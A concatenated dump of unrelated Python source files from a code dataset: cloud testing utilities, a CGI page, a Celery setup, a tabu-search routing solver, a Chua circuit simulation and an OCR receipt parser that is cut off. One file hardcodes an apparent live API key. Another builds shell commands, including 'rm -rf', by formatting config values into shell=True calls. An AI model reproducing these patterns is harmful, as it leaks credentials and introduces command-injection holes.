configparser.ConfigParser()\n config.read(config_path)\n section = config.sections()[0]\n options = config.options(section)\n for option in options:\n value = config.get(section, option)\n self.values[option] = value\n\n def create_account(self):\n # create new account\n if not self.values['account']:\n self.logging.info(' [*] Create new account .... ')\n print(' [*] Create new account .... 
')\n self.account = self.random_string()\n api = 'https://' + self.values['environment'] + '/restmachine/cloudbroker/account/create'\n client_header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'}\n client_data = {'name': self.account,\n 'username': self.values['username'],\n 'maxMemoryCapacity': -1,\n 'maxVDiskCapacity': -1,\n 'maxCPUCapacity': -1,\n '&maxNASCapacity': - 1,\n 'maxArchiveCapacity': -1,\n 'maxNetworkOptTransfer': - 1,\n 'maxNetworkPeerTransfer': - 1,\n 'maxNumPublicIP': - 1,\n 'location': self.values['location']}\n client_response = self.client._session.post(url=api, headers=client_header, data=client_data)\n\n if client_response.status_code == 200:\n self.account_id = client_response.text\n self.values['account'] = self.account\n self.logging.info(' [*] DONE : Create %s account' % self.account)\n else:\n self.logging.error(' [*] ERROR : response status code %i' % client_response.status_code)\n self.logging.error(' [*] ERROR : response content %s' % client_response.content)\n client_response.raise_for_status()\n else:\n self.account = self.values['account']\n self.get_account_ID(self.account)\n self.logging.info(' [*] Use %s account' % self.values['account'])\n\n def run_cmd_via_subprocess(self, cmd):\n sub = Popen([cmd], stdout=PIPE, stderr=PIPE, shell=True)\n out, err = sub.communicate()\n if sub.returncode == 0:\n return out.decode('utf-8')\n else:\n error_output = err.decode('utf-8')\n raise RuntimeError(\"Failed to execute command.\\n\\ncommand:\\n{}\\n\\n\".format(cmd, error_output))\n\n def get_testcases_templates(self):\n repo = self.values['repo']\n branch = self.values['branch']\n bps_driver_path = 'TestCasesTemplate'\n if 'https' in repo:\n temp = repo.split('/')[-1]\n repo_name = temp[:temp.find('.')]\n else:\n match = re.search(r'/(\\S+).git', repo)\n repo_name = match.group(1)\n\n # make directory to clone repos on\n if self.clone:\n dir_path = os.getcwd() + '/cockpit_testing/Framework/%s' % bps_driver_path\n if os.path.exists(dir_path):\n self.run_cmd_via_subprocess('rm -rf %s' % dir_path)\n self.run_cmd_via_subprocess('cd cockpit_testing/Framework/; mkdir %s' % bps_driver_path)\n dirs = self.run_cmd_via_subprocess('ls').split('\\n')[:-1]\n if 'repos' not in dirs:\n print(' [*] create repos directory')\n self.run_cmd_via_subprocess('mkdir repos')\n else:\n print(' [*] repos directory already exists')\n\n dirs = self.run_cmd_via_subprocess('ls repos').split('\\n')[:-1]\n if repo_name in dirs:\n self.run_cmd_via_subprocess('cd repos; rm -rf %s' % repo_name)\n print(' [*] clone repo %s' % repo)\n print(' [*] branch %s' % branch)\n self.run_cmd_via_subprocess('cd repos; git clone -b %s %s' % (branch, repo))\n # copy blueprints test templates\n self.run_cmd_via_subprocess(\n 'cp -r repos/%s/tests/bp_test_templates/. 
cockpit_testing/Framework/%s' % (repo_name, bps_driver_path))\n\n def get_jwt(self):\n client_id = self.values['client_id']\n client_secret = self.values['client_secret']\n\n params = {\n 'grant_type': 'client_credentials',\n 'client_id': client_id,\n 'client_secret': client_secret\n }\n\n url = 'https://itsyou.online/v1/oauth/access_token?'\n resp = requests.post(url, params=params)\n resp.raise_for_status()\n access_token = resp.json()['access_token']\n url = 'https://itsyou.online/v1/oauth/jwt'\n headers = {'Authorization': 'token %s' % access_token}\n data = {'scope': 'user:memberOf:%s' % client_id}\n resp = requests.post(url, data=json.dumps(data), headers=headers)\n self.values['jwt'] = resp.content\n\n def generate_xml_results(self):\n print(' [*] Generate XML results')\n Succeeded = 0\n Errors = 0\n Failures = 0\n Skip = 0\n # remove first one\n self.Testcases_results.pop(\"Blueprint Name\")\n\n for key in self.Testcases_results:\n for item in self.Testcases_results[key]:\n if 'ERROR' in item[0]:\n Errors += 1\n break\n elif 'FAILED' in item[0]:\n Failures += 1\n break\n elif 'Skip' in item[0]:\n Skip += 1\n break\n elif 'OK' in item[0]:\n Succeeded += 1\n break\n elif 'Time' in item[0]:\n continue\n else:\n print('The result is missing an indicator element')\n break\n\n testsuit_params = {'name': 'Cockpit_Testing',\n 'tests': str(len(self.Testcases_results)),\n 'succeeded': str(Succeeded),\n 'errors': str(Errors),\n 'failures': str(Failures),\n 'skip': str(Skip)}\n\n testsuit = Element('testsuite', testsuit_params)\n\n for key in self.Testcases_results:\n testcase_params = {'classname': \"/cockpit_testing/Framework/TestCases/\" + key,\n 'name': key,\n 'time': str(self.Testcases_results[key][0][1])}\n\n testcase = SubElement(testsuit, 'testcase', testcase_params)\n for item in self.Testcases_results[key]:\n if 'ERROR' in item[0]:\n error = SubElement(testcase, 'error')\n error_message = str(item[0])\n service_name = str(item[1])\n error.text = \" service: %s - Message: %s\" % (service_name, error_message)\n elif 'FAILED' in item[0]:\n failuer = SubElement(testcase, 'failure')\n failuer_message = str(item[0])\n service_name = str(item[1])\n failuer.text = \" service: %s - Message: %s\" % (service_name, failuer_message)\n elif 'Skip' in item[0]:\n skipped = SubElement(testcase, 'skipped')\n skipped_message = str(item[2])\n service_name = str(item[3])\n skipped.text = \" service: %s - Message: %s\" % (service_name, skipped_message)\n resultFile = open('testresults.xml', 'w')\n resultFile.write(BeautifulSoup((tostring(testsuit)), 'xml').prettify())\n\n def get_jobs(self, specific_blueprint_list):\n # Return : All paths which is under TestCases dir.\n utils_dir = os.path.dirname(__file__)\n test_cases_directory = os.path.join(utils_dir, \"../TestCases/\")\n test_cases_files = os.listdir(test_cases_directory)\n test_cases_path = []\n skip_testcases=[]\n if specific_blueprint_list:\n for specific_blueprint in specific_blueprint_list:\n if '.yaml' not in specific_blueprint:\n specific_blueprint += '.yaml'\n\n if specific_blueprint in self.skiptests:\n print((' [*] Test case : %s --skip' % specific_blueprint))\n self.Testcases_results[specific_blueprint] = [['Skip', 0, skiptests[specific_blueprint], specific_blueprint]]\n skip_testcases.append(specific_blueprint)\n continue\n\n for file in test_cases_files:\n if specific_blueprint != file:\n continue\n else:\n test_cases_path.append(os.path.join(test_cases_directory, file))\n break\n else:\n for file in test_cases_files:\n if file in 
self.skiptests:\n print((' [*] Test case : %s --skip' % file))\n self.Testcases_results[file] = [['Skip', 0, skiptests[file], file]]\n skip_testcases.append(file)\n continue\n test_cases_path.append(os.path.join(test_cases_directory, file))\n\n if len(test_cases_path) == 0 and len(test_cases_files) > 0 and len(skip_testcases) == 0:\n raise NameError('There is no %s blueprint in TestCases dir' % str(specific_blueprint_list))\n return test_cases_path\n\n def log(self, log_file_name='log.log'):\n self.logging.basicConfig(filename=log_file_name, filemode='w', level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n '''\n How to use:\n self.logging.debug(\"This is a debug message\")\n self.logging.info(\"Informational message\")\n self.logging.error(\"An error has happened!\")\n '''\n\n def request_handling(self, method, api, headers, body, expected_responce_code=200):\n # This method handle the api request errors for 10 times.\n\n if method not in ['post', 'get', 'delete']:\n raise NameError(\" [*] %s method isn't handled\" % method)\n\n for _ in range(30):\n try:\n if method == 'get':\n response = self.requests.get(url=api, headers=headers, data=body)\n elif method == 'post':\n response = self.requests.post(url=api, headers=headers, data=body)\n elif method == 'delete':\n response = self.requests.delete(url=api, headers=headers, data=body)\n\n if response.status_code == expected_responce_code:\n return [True, response]\n else:\n time.sleep(2)\n # print response.url, response.status_code, response.content\n except:\n time.sleep(2)\n\n return [False, response]\n\n def get_client(self):\n for _ in range(30):\n try:\n self.client = Client('https://' + self.values['environment'], self.values['username'],\n self.values['password'])\n break\n except:\n time.sleep(1)\n else:\n self.client = Client('https://' + self.values['environment'], self.values['username'],\n self.values['password'])\n\n def get_account_ID(self, account):\n client_header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'}\n self.logging.info(' [*] Get %s account ID .... ' % account)\n api = 'https://' + self.values['environment'] + '/restmachine/cloudapi/accounts/list'\n client_response = self.client._session.post(url=api, headers=client_header)\n\n if client_response.status_code == 200:\n for element in client_response.json():\n if account == element['name']:\n self.account_id = element['id']\n self.logging.info(' [*] DONE : Account ID : % d' % self.account_id)\n break\n else:\n self.logging.error(\n \" [*] ERROR : Can't get %s account ID. Please, Make sure that %s username can get this account ID\" % (\n account, self.values['username']))\n print(\n \" [*] ERROR : Can't get %s account ID. Please, Make sure that %s username can get this account ID\" % (\n account, self.values['username']))\n raise NameError(\n \" [*] ERROR : Can't get '%s' account ID. 
Please, Make sure that '%s' username can get this account ID\" % (\n account, self.values['username']))\n else:\n self.logging.error(' [*] ERROR : response status code %i' % client_response.status_code)\n self.logging.error(' [*] ERROR : response content %s' % client_response.content)\n client_response.raise_for_status()\n\n def check_cockpit_is_exist(self):\n tmp = self.values['cockpit_url']\n url = tmp[:tmp.find(':5')]\n\n try:\n response = self.requests.get(url=url)\n if response.status_code != 200:\n self.logging.error('ERROR : response status code %i' % response.status_code)\n self.logging.error('ERROR : response content %s ' % response.content)\n raise NameError('ERROR : response status code %i' % response.status_code)\n except:\n self.logging.error(\"Can't Create a connection to the '%s' cockpit machine\" % url)\n raise NameError(\"Can't Create a connection to the '%s' cockpit machine\" % url)\n\n def get_waiting_time(self, bpFileName):\n if bpFileName in self.execution_time:\n time = self.execution_time[bpFileName]\n if time > 10:\n return int(time / 10)\n else:\n return int(time)\n","sub_path":"cockpit_testing/Framework/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327355163","text":"#!/usr/bin/env python3\n\nimport Tipo, TipoDAO\nfrom FormatData import FormatData\n\ntipo = Tipo.Tipo()\ntipoDAO = TipoDAO.TipoDAO()\n\nprint(\"Content-type: text/html\\n\")\n\n\nprint(\n\"\"\"\n\n\n\t\n\t\t\n\t\n\t\n\t\tTipos de Compromissos!!!
\n\t\tNovo
\n\"\"\")\n\nfor tipo in tipoDAO.getLista():\n\tprint(\\\n\t\t\"\t\t{}
\".format(\\\n\t\t\ttipo.getCOD_TIPO(),\\\n\t\t\ttipo.getTIPO()\n\t\t))\n\nprint(\n\"\"\"\n\n\n\"\"\")\n","sub_path":"cgi-bin/tipos.py","file_name":"tipos.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494836391","text":"from os import environ\n\nfrom celery import Celery\nfrom kombu import Exchange, Queue, binding\n\n\ndef init_celery(name, tasks_pkg, routing_keys):\n \"\"\"\n Initializing celery to point to a rabbitmq type of broker\n\n Args:\n name (str): Name for the app. Will also be used as the default queue name.\n Will be one of ['consumer', 'producer']\n tasks_pkg (str): Package where tasks for the app being created are located.\n will be either kubernetes_test.producer or kubernetes_test.consumer\n routing_keys (list): List of routing keys to listen on for messages.\n\n Returns:\n Celery: Celery app object\n \"\"\"\n\n # Create celery app\n app = Celery(\n 'kubernetes_test.{}'.format(name),\n broker=environ['BROKER_CNX_STRING']\n )\n\n # Discover tasks appropriate to tge app being created\n app.autodiscover_tasks([tasks_pkg], force=True)\n\n # Set the default queue name so it matches the app name for easy identification\n app.conf.task_default_queue = name\n\n # use ts.messaging exchange\n messaging_exchange = Exchange('ts.messaging')\n\n # add the default queue name to the routing keys list\n routing_keys.append(app.conf.task_default_queue)\n\n bindings = (\n binding(messaging_exchange, routing_key=routing_key)\n for routing_key in routing_keys\n )\n\n app.conf.task_queues = [\n Queue(name, list(bindings))\n ]\n\n return app\n","sub_path":"kubernetes_test/factory/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"584325365","text":"from itertools import combinations\nimport copy\n\ndistance_mtrx = [[0, 3, 26, 55, 42, 56, 63, 9, 100],\n [3, 0, 3, 5, 4, 7, 4, 2, 3],\n [26, 3, 0, 2, 6, 3, 6, 8, 6],\n [55, 5, 2, 0, 5, 5, 9, 5, 5],\n [42, 4, 6, 5, 0, 2, 5, 8, 2],\n [56, 7, 3, 5, 2, 0, 6, 4, 6],\n [63, 4, 6, 9, 5, 6, 0, 2, 8],\n [9, 2, 8, 5, 8, 4, 2, 0, 3],\n [100, 3, 6, 5, 2, 6, 8, 3, 0]]\n\nservice_time_in = [[0, 100],\n [24, 35],\n [20, 25],\n [13, 15],\n [14, 23],\n [34, 46],\n [87, 102],\n [80, 89],\n [0, 500]\n ]\n\npickup_delivery_time_in = [[0, 0],\n [2, 3],\n [3, 5],\n [4, 2],\n [5, 2],\n [2, 5],\n [4, 4],\n [3, 6],\n [0, 0]]\n\ntabu_list = []\n\n\n# cost minimization function --- min(t[i][j]+wait_time[j])\ndef get_heuristic(src, dest, service_start_time):\n wait = get_earliest_service_time(dest) - service_start_time - get_distance(src, dest) - get_pickup_time(src\n ) - get_delivery_time(\n src)\n wait = wait if wait > 0 else 0\n print('waiting time : {0} Distance : {1}'.format(wait, get_distance(src, dest)))\n return get_distance(src, dest) + wait\n\n\ndef generate__initial_solution():\n numOfV = 3\n setOfV = range(1, numOfV + 1)\n routes = [[]] # zero indexed route kept empty to maintain meaningful reference\n service_start_time = [[]]\n cost_data = [[]]\n unserviced = list(range(1, len(distance_mtrx) - 1))\n k = 1\n while len(unserviced) > 0 and k in setOfV: # Vehicle level loop\n routes.append([0])\n service_start_time.append([0])\n cost_data.append([0])\n best_nbr = 0\n minim = 1000000\n end_node = len(distance_mtrx) - 1\n no_progress = False\n route_index = 1\n while len(\n unserviced) > 0 and not no_progress: # Route level loop for vehicle gives route for vehicle when completed\n\n visiting = best_nbr\n print('----------------------------------------------------------------')\n print('starting looking up best next node for : {0}'.format(visiting))\n no_progress = False\n minim = 100000\n for i in range(1, len(distance_mtrx) - 1): # finding best neighbour\n if i == visiting or not is_servisable(visiting, i, service_start_time[k][\n route_index - 1]) or i not in unserviced:\n no_progress = True\n continue\n no_progress = False\n print('checking cost for : {0}'.format(i))\n cost1 = get_heuristic(visiting, i, service_start_time[k][route_index - 1])\n if int(cost1) < int(minim) and i not in routes[k] and i != end_node and i in unserviced:\n minim = cost1\n if len(cost_data[k]) < route_index + 1:\n cost_data[k].append(0)\n if len(routes[k]) < route_index + 1:\n routes[k].append(0)\n if len(service_start_time[k]) < route_index + 1:\n service_start_time[k].append(0)\n cost_data[k][route_index] = minim\n routes[k][route_index] = i\n best_nbr = i\n print('now best next node for : {0} is {1}'.format(visiting, i))\n service_start_time[k][route_index] = get_service_start_time(i, service_start_time[k][\n route_index - 1], visiting)\n # print(no_progress)\n if best_nbr != 0:\n unserviced.remove(best_nbr)\n route_index = route_index + 1\n routes[k].append(end_node)\n cost_data[k].append(distance_mtrx[routes[k][-2]][end_node])\n k = k + 1\n\n if len(unserviced) > 0:\n print('making route for customer which are not serviced due to delay the route will be used during tabu search')\n routes.append([0])\n for i in unserviced:\n routes[k].append(i)\n routes[k].append(len(distance_mtrx) - 1)\n print(routes[k])\n\n for route in routes:\n if is_empty_route(route):\n print('removing empty routes that is from start depot to end depot only')\n cost_data.remove(cost_data[routes.index(route)])\n 
routes.remove(route)\n return cost_data, routes\n\n\ndef is_servisable(src, dest, src_service_start_time):\n if get_distance(src, dest) + src_service_start_time + get_pickup_time(src) + get_delivery_time(\n src) > get_latest_service_time(dest):\n return False\n return True\n\n\ndef get_delay(src, dest, si_src):\n return service_time_in[dest][1] - distance_mtrx[src][dest] - pickup_delivery_time_in[src][0] - \\\n pickup_delivery_time_in[src][1] - si_src\n\n\ndef get_exchange_neighbour(soln):\n neighbours = []\n for combo in list(combinations(soln, 2)):\n for i in combo[0][:-1]:\n for j in combo[1][:-1]:\n if i == 0 or j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[0])\n _c1 = copy.deepcopy(combo[1])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[0]))\n _c1.insert(_c1.index(j), i)\n _c0.insert(_c0.index(i), j)\n _c1.remove(j)\n _c0.remove(i)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (3, j, i, idx2, idx1, 3)))\n\n for i in combo[1][1:-1]:\n for j in combo[0][1:-1]:\n if i == 0 or j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[1])\n _c1 = copy.deepcopy(combo[0])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[1]))\n _c1.insert(_c1.index(j), i)\n _c0.insert(_c0.index(i), j)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (3, j, i, idx2, idx1, 3)))\n\n # print(\"{0} number of Neighbours after Exchange {1}\".format(len(neighbours), neighbours))\n neighbours.sort(key=lambda x: x[1][-1])\n print(\"{0} number of sorted Neighbours after exchange {1}\".format(len(neighbours), neighbours))\n return neighbours[0]\n\n\ndef get_relocate_neighbour(soln):\n neighbours = []\n for combo in list(combinations(soln, 2)):\n for i in combo[0][:-1]:\n for j in combo[1][:-1]:\n if j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[0])\n _c1 = copy.deepcopy(combo[1])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[0]))\n _c1.remove(j)\n _c0.insert(_c0.index(i) + 1, j)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (1, j, i, idx2, idx1, 3)))\n\n for i in combo[1][:-1]:\n for j in combo[0][:-1]:\n if j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[1])\n _c1 = copy.deepcopy(combo[0])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[1]))\n _c1.remove(j)\n _c0.insert(_c0.index(i) + 1, j)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (1, j, i, idx2, idx1, 3)))\n\n # print(\"{0} number of Neighbours after relocation {1}\".format(len(neighbours), neighbours))\n neighbours.sort(key=lambda x: x[1][-1])\n print(\"{0} number of sorted Neighbours after relocation {1}\".format(len(neighbours), neighbours))\n return neighbours[0]\n\n\ndef get_neighbours(op, soln):\n if op == 1:\n # relocate op\n return get_relocate_neighbour(soln)\n elif op == 2:\n # relocate split op\n # return get_relocate_split_neighbour(soln)\n pass\n elif op == 
3:\n return get_exchange_neighbour(soln)\n elif op == 4:\n # return get_2opt_neighbour(soln)\n pass\n\n\ndef get_solution_cost(soln: list):\n t = 0\n wait = 0\n delay = 0\n for route in soln:\n prev = 0\n for customer in route:\n t = t + get_distance(prev, customer) + get_pickup_time(prev) + get_delivery_time(prev)\n wait = wait + ((get_earliest_service_time(customer) - t) if (get_earliest_service_time(\n customer) - t) > 0 else 0)\n delay = delay + ((t - get_latest_service_time(customer)) if (t - get_latest_service_time(\n customer)) > 0 else 0)\n prev = customer\n\n return t, delay, wait, t + delay + wait\n\n\ndef tabu_search(routes: list, itrations):\n best_soln = routes\n best_cost = ()\n for i in range(itrations - 1):\n _sol1 = get_neighbours(1, best_soln)\n _sol2 = get_neighbours(3, best_soln)\n if _sol1[1][-1] < _sol2[1][-1]:\n best_soln = _sol1[0]\n best_cost = _sol1[1]\n tabu_list.append(TabuListClass(_sol1[2][0], _sol1[2][1:-1], _sol1[2][-1]))\n else:\n best_soln = _sol2[0]\n best_cost = _sol2[1]\n tabu_list.append(TabuListClass(_sol1[2][0], _sol1[2][1:-1], _sol1[2][-1]))\n\n return best_soln, best_cost\n\n\n# input provider methods\ndef get_distance(src, dest):\n return distance_mtrx[src][dest]\n\n\ndef get_pickup_time(cust):\n return pickup_delivery_time_in[cust][0]\n\n\ndef get_delivery_time(cust):\n return pickup_delivery_time_in[cust][1]\n\n\ndef get_earliest_service_time(cust):\n return service_time_in[cust][0]\n\n\ndef get_latest_service_time(cust):\n return service_time_in[cust][1]\n\n\ndef get_service_start_time(cust, prev_cust_service_start_time, prev_cust):\n time_distance = prev_cust_service_start_time + get_delivery_time(prev_cust) + get_pickup_time(\n prev_cust) + get_distance(prev_cust, cust)\n if time_distance > get_earliest_service_time(cust):\n return time_distance\n else:\n return get_earliest_service_time(cust)\n\n\ndef is_empty_route(route: list):\n if len(route) == 2 and 0 in route and len(distance_mtrx) - 1 in route:\n return True\n return False\n\n\ndef contains(list, filter):\n for x in list:\n if filter(x):\n return True\n return False\n\n\nclass TabuListClass:\n def __init__(self, op, move, valid_for):\n self.op = op\n self.move = move\n self.valid_for = valid_for\n\n def checked(self):\n self.valid_for -= 1\n\n def found_match(self, move):\n if self.move == move and self.valid_for > 0:\n print(\"found tabu match op : {0} move : {1}\".format(self.op, self.move))\n self.valid_for -= 1\n return True\n return False\n\n\ncost, routes = generate__initial_solution()\nprint(\"Best solution: {0}, with total cost: {1}\".format(routes, cost))\nroutes.remove([])\nbest_soln, best_cost = tabu_search(routes, 20)\nprint(\"solution is : {0} with costs : {1}\".format(best_soln, best_cost))\nfor route in best_soln:\n print(\"Route{0} is: {1}\".format(best_soln.index(route), route))\n\nprint(\"total distance: {0}\".format(best_cost[0]))\nprint(\"total waiting: {0}\".format(best_cost[1]))\nprint(\"total delay: {0}\".format(best_cost[2]))\nprint(\"total cost: {0}\".format(best_cost[3]))\n","sub_path":"greedy_with_delay.py","file_name":"greedy_with_delay.py","file_ext":"py","file_size_in_byte":12666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"22033175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 11 22:27:34 2015\n\n@author: Brenda_Brandy\n\"\"\"\n\nfrom __future__ import division, print_function\n\nfrom numpy import array, arange\n##from pylab import plot, show\nfrom visual import *\n\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\"\"\"\n\n\n\"\"\"\n#coefficients\nc1 = 1.0 / 10.0\nc2 = 1.0 / 0.5\nG = 0.7\nL = 1.0 / 7.0\n\"\"\"\n\n#different initial conditions\n\n#for the large stable limit cycle\n#r_array = array([ 1.45305 ,-4.36956 ,0.15034 ],float)\n\n#for the large stable limit cycle\n#r_array = array([ 9.13959 , - 1.35164 , - 59.2869],float)\n\n#for the hyperbolic periodic orbit with period T = 3.93615\n#r_array = array([ 10.00717 , 0.80100 ,-23.90375 ],float)\n\n#for the double scroll attractor\nr_array = array([ 0.15264, -0.02281 ,0.38127 ],float)\n\n#coefficients for double scroll attractor\nc1 = 1.0 / 9.0\nc2 = 1.0 \nG = 0.7\nL = 1.0 / 7.0\n\n\n\"\"\"\n#Negative Resistor current, piecewise function voltage should be vc1\n\ndef g(v):\n\tif v > -1 and v < 1:\n\t\treturn -4.0 * v\n\telif v > 1: #if v is bigger than 1\n\t\treturn -4.0 - 0.1*(v-1.0)\n\telse: #if v is less than -1\n\t\treturn 4.0 - 0.1*(v+1.0)\n\n\"\"\"\n\n#Negative Resistor current, piecewise function voltage should be vc1\n#for double scroll\ndef g(v):\n\tif v > -1 and v < 1:\n\t\treturn -0.8* v\n\telif v > 1: #if v is bigger than 1\n\t\treturn -0.8 - 0.5*(v-1.0)\n\telse: #if v is less than -1\n\t\treturn 0.8 - 0.5*(v+1.0)\n\n#define vector function f\ndef f(r_array,t):\n x = r_array[0] #voltage across c1\n y = r_array[1] #voltage across c2\n z = r_array[2] #current across L\n fx = (G*(y-x) - g(x) ) / c1\n fy = (G*(x - y) + z) / c2\n fz = - y / L\n return array([fx,fy,fz],float)\n\n#initial condition and step size\nt_i = 0.0\n#t_f = 50.0\nt_f = 300.0\nN = 10000.0\nh = (t_f-t_i) / N\n\ntpoints = arange(t_i,t_f,h)\nxpoints = []\nypoints = []\nzpoints = []\n\n#fourth order RK loop\nfor t in tpoints:\n xpoints.append(r_array[0])\n ypoints.append(r_array[1])\n zpoints.append(r_array[2])\n k1 = h*f(r_array,t)\n k2 = h*f(r_array+0.5*k1, t+0.5*h)\n k3 = h*f(r_array+0.5*k2, t+0.5*h)\n k4 = h*f(r_array+k3, t+h)\n \n r_array += (k1+2*k2+2*k3+k4)/6.0\n\n#plot y against t \n#plot(tpoints,ypoints)\n#show()\n\n#plot z againt x\n#plot (xpoints,zpoints)\n#show()5\n\n\"\"\"\nax.plot(xpoints, ypoints, zpoints, label = \"double scroll\")\nax.legend()\nplt.show()\n\"\"\"\n\n#for animation\nball = sphere(make_trail=True, trail_type=\"curve\", interval=1, retain=20)\nball2 = sphere(make_trail=True, trail_type=\"curve\", interval=1, retain=20, color = color.blue)\nball.radius = 0.1\nball2.radius = 0.1\nball2.trail_object.color=color.blue\nball.pos = (xpoints[0],ypoints[0],zpoints[0])\npointer = arrow(pos=(xpoints[500],ypoints[500],zpoints[500]),axis=(xpoints[500]-xpoints[0],ypoints[500]-ypoints[0],zpoints[500]-zpoints[0]), shaftwidth=0.05)\nn = 500\nfor i in range(1, int(N)-n):\n rate(120)\n ball.pos = (xpoints[i], ypoints[i], zpoints[i])\n ball2.pos = (xpoints[i+n], ypoints[i+n], zpoints[i+n])\n pointer.pos = (xpoints[i+n],ypoints[i+n],zpoints[i+n])\n pointer.axis = (-xpoints[i+n]+xpoints[i],-ypoints[i+n]+ypoints[i],-zpoints[i+n]+zpoints[i])\n \n\n","sub_path":"chuacircuit_trace.py","file_name":"chuacircuit_trace.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"334713843","text":"import io\nimport os\nimport requests\nimport json\nimport string, re\nimport unidecode\nfrom support_classes.botstrings import BotStrings\nfrom support_classes.botkeyboardmanager import KeyboardManager\nfrom support_classes.userintent import UserIntent\n\nclass UserImageParser:\n\n\tdef __init__(self):\n\t\tself.log = \"LOGGING - USERIMAGEPARSER: \"\n\t\tself.botstrings = BotStrings()\n\t\tself.keyboardmanager = KeyboardManager()\n\n\tdef scan_image(self, file_id, messenger, destination_id, customer_project_list, target_user):\n\t\tpayload = {'isOverlayRequired': False,\n\n\t\t\t\t 'apikey': '477608fa3788957',\n\n\t\t\t\t 'language': 'eng',\n\n\t\t\t\t }\n\t\tfilename = file_id + '.jpeg'\n\t\tprint(self.log + \"CALLING OCR API\")\n\t\tmessenger.send_message(destination_id, self.botstrings.LOOKING_AT_IMAGE, None)\n\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\n\t\twith open(filename, 'rb') as f:\n\n\t\t\tr = requests.post('https://api.ocr.space/parse/image',\n\n\t\t\t\t\t\t\t files={filename: f},\n\n\t\t\t\t\t\t\t data=payload,\n\n\t\t\t\t\t\t\t )\n\t\tmessenger.send_message(destination_id, self.botstrings.READING_IMAGE, None)\n\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\n\t\tprint(self.log + \"DECODING IMAGE CONTENT\")\n\t\tresult_content = r.content.decode()\n\t\tjson_data = json.loads(result_content)\n\t\tprint(json_data[\"ParsedResults\"][0][\"ParsedText\"])\n\t\tself.get_trailer_number(json_data[\"ParsedResults\"][0][\"ParsedText\"], messenger, destination_id, customer_project_list, target_user)\n\t\t# return trailer_number, trailer_number_found\n\n\tdef get_trailer_number(self, image_content, messenger, destination_id, customer_project_list, target_user):\n\t\timage_data = []\n\t\ttrailer_number = []\n\t\ttrailer_choice = \"\"\n\t\tcontract_no = \"\"\n\t\tload_no = None\n\t\ttrailer_number_found = False\n\t\tis_digital_order = False\n\t\tlist_of_numbers = []\n\t\tprint(self.log + \"SPLITTING IMAGE CONTENT INTO LINES\")\n\t\tfor line in image_content.splitlines():\n\t\t\t# alpha_num = ''.join(e for e in line if e.isalnum())\n\t\t\t# unaccented_string = unidecode.unidecode(alpha_num)\n\t\t\talpha_num = re.sub(r'[^\\w]', ' ', line)\n\t\t\timage_data.append(alpha_num.lstrip().rstrip())\n\n\t\tfor data in image_data:\n\t\t\talphabet = ''.join(i for i in data if not i.isdigit())\n\t\t\tprint(self.log + \"IMAGE CONTAINS \" + data)\n\t\t\tif alphabet.lower().replace(' ', '') in self.botstrings.DO_INDICATOR or alphabet.lower().replace(' ', '') in self.botstrings.CONTRACT_INDICATOR:\n\t\t\t\tprint(self.log + \"IMAGE DATA COMES FROM A DIGITAL ORDER - KEYWORD: \" + data)\n\t\t\t\tis_digital_order = True\n\t\t\t\tbreak\n\n\t\tif is_digital_order:\n\t\t\tproject_name_results = []\n\t\t\tmessenger.send_message(destination_id, self.botstrings.DELIVERY_ORDER, None)\n\t\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\t\t\tfor data in image_data:\n\t\t\t\tif data.isdigit():\n\t\t\t\t\tlist_of_numbers.append(data)\n\t\t\t\tprint(self.log + \"DELIVERY ORDER CONTAINS \" + data)\n\t\t\t\talphabet = ''.join(i for i in data if not i.isdigit())\n\t\t\t\t# CHECK FOR TRAILER\n\t\t\t\tcontains_prefix, prefix = self.botstrings.contains_trailer_prefix(data)\n\t\t\t\tcontains_contract_prefix, contract_no = self.botstrings.contains_contract_no(data)\n\t\t\t\tif contains_prefix:\n\t\t\t\t\tprint(self.log + 